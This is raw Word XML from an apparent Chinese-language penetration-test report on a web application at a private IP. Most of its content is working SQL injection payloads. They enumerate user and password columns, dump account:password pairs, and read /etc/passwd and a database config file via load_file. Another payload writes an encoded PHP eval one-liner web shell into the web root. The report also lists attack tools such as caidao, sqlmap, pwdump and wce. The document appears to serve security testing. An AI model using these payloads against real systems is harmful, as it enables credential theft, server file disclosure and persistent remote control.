      </w:r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pstools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRP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Htran,ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7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B60402">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwdump,wce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B7147F" w:rsidRDefault="00B7147F">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1EED" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc532983532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>附件</w:t>
      </w:r>
      <w:r w:rsidR="00DF6D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00DF6D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段与工具说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRPr="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc532983533"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>1.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包含</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>””</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的表、字段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r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and%201=2%20union%20select%20group_concat%28table_schema,0x3a,table_name,0x3a,column_name%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+LIKE+CHAR%2837,%20117,%20115,%20101,%20114,%2037%29</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRPr="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc532983534"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>2.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包含</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>pass</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的表、字段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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and%201=2%20union%20select%20group_concat%28table_schema,0x3a,table_name,0x3a,column_name%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+LIKE+CHAR%2837,%20112,%2097,%20115,%2037%29</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRPr="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc532983535"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>3.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表</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>tcic_account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF6D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的所有字段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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and%201=2%20union%20select%20group_concat%28column_name%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=%27tcic_account%27- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRPr="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc532983536"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>4.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查询表</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>tcic_account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF6D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的所有用户密码内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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and%201=2%20union%20select%20group_concat%28account,0x3a,password%29,2,3,4,5,6,7,8,9,10,11,12,13+from+tcic_account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B7147F" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc532983537"/>
      <w:r w:rsidRPr="00E96E03">
        <w:lastRenderedPageBreak/>
        <w:t>5.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读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96E03">
        <w:t>/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF6D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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and%201=2%20union%20select%20load_file%280x2f6574632f706173737764%29,2,3,4,5,6,7,8,9,10,11,12,13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRPr="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc532983538"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96E03">
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>/back/publish_add.php</w:t>
      </w:r>
      <w:r w:rsidR="00DF6D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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and%201=2%20union%20select%20load_file%280x2f6c6f63616c2f6874646f63732f6261636b2f7075626c6973685f6164642e706870%29,2,3,4,5,6,7,8,9,10,11,12,13—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRPr="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc532983539"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>7.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读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96E03">
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>/dbconf.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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>and%201=2%20union%20select%20load_file%280x2f6c6f63616c2f6874646f63732f636f6e6669672f6462636f6e662e706870%29,2,3,4,5,6,7,8,9,10,11,12,13--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRPr="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc532983540"/>
      <w:r w:rsidRPr="00E96E03">
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidR="00096FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96E03">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00DF6D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根目录写入文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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and 1=2 union select char(60,63,112,104,112,32,64,101,118,97,108,40,36,95,80,79,83,84,91,39,115,104,97,99,107,39,93,41,59,63,62),2,3,4,5,6,7,8,9,10,11,12,13 into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 '/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/zm.php‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRPr="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc532983541"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00096FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF6D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能用到的工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>caidao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>一句话</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>转换工具</w:t>
      </w:r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E96E03" w:rsidRPr="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00E96E03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  <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>自动化注入工具：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sqlmap,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pangolin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E96E03">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRDefault="00E96E03" w:rsidP="00097BBD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</w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc532983542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：漏洞说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00297D59" w:rsidRDefault="00DF6D4E" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc532983543"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00297D59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00297D59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00C72D46" w:rsidRPr="00C72D46" w:rsidRDefault="00275046" w:rsidP="00C72D46">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00DF6D4E" w:rsidRPr="00C72D46">
          <w:rPr>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>http://192.168.203.144/storypage_04.php?id=115</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3324225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="952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C37BF.tmp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Pr="00C72D46" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:pPr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利用代码：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包含</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>的表、字段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http://192.168.203.144/storypage_04.php?id=115and%201=2%20union%20select%20group_concat%28table_schema,0x3a,table_name,0x3a,column_name%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.co</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>lumns+where+column_name+LIKE+CHAR%2837,%20117,%20115,%20101,%20114,%2037%29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包含</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>的表、字段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 and%201=2%20union%20select%20group_concat%28table_schema,0x3a,table_name,0x3a,column_name%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+LIKE+CHAR%2837,%20112,%2097,%20115,%2037%29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表</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>tcic_account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>的所有字段：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 and%201=2%20union%20select%20group_concat%28column_name%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=%27tcic_account%27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查询表</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>tcic_account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>的所有用户密码内容：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 and%201=2%20union%20select%20group_concat%28account,0x3a,password%29,2,3,4,5,6,7,8,9,10,11,12,13+from+tcic_account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读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>文件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/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 and%201=2%20union%20select%20load_file%280x2f6574632f706173737764%29,2,3,4,5,6,7,8,9,10,11,12,13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读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/back/publish_add.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>文件：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lastRenderedPageBreak/>
        <w:t>http://192.168.203.144/storypage_04.php?id=115 and%201=2%20union%20select%20load_file%280x2f7661722f7777772f6261636b2f7075626c6973685f6164642e706870%29,2,3,4,5,6,7,8,9,10,11,12,13--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读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/dbconf.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
